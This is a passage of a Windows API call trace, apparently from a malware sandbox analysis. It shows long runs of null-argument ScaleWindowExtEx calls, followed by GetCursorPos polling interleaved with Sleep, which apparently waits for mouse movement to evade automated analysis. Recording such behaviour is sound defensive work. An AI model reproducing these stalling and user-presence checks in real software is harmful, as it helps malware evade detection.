| out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.142] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.142] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.142] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.142] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.142] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.142] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.142] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.142] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.142] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.142] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.146] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.147] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.148] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.149] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.149] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.149] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.149] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.149] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.149] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.149] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.149] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.149] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.149] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.149] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0222.204] GetCursorPos (in: lpPoint=0x18ff2c | out: lpPoint=0x18ff2c*(x=667, y=523)) returned 1 [0222.204] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0222.204] Sleep (dwMilliseconds=0xac) [0222.379] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0222.379] Sleep (dwMilliseconds=0xac) [0222.566] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0222.566] Sleep (dwMilliseconds=0xac) [0222.753] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0222.753] Sleep (dwMilliseconds=0xac) [0222.940] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0222.940] Sleep (dwMilliseconds=0xac) [0223.127] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0223.128] Sleep (dwMilliseconds=0xac) [0223.315] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0223.315] Sleep (dwMilliseconds=0xac) [0223.502] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0223.502] Sleep (dwMilliseconds=0xac) [0223.689] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0223.689] Sleep (dwMilliseconds=0xac) [0223.876] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0223.876] Sleep (dwMilliseconds=0xac) [0224.064] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0224.064] Sleep (dwMilliseconds=0xac) [0224.251] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0224.511] Sleep (dwMilliseconds=0xac) [0224.688] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0224.689] Sleep (dwMilliseconds=0xac) [0224.875] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0224.875] Sleep (dwMilliseconds=0xac) [0225.062] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0225.062] Sleep (dwMilliseconds=0xac) [0225.249] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=523)) returned 1 [0225.249] Sleep (dwMilliseconds=0xac) [0225.440] GetCursorPos (in: lpPoint=0x18ff34 | out: 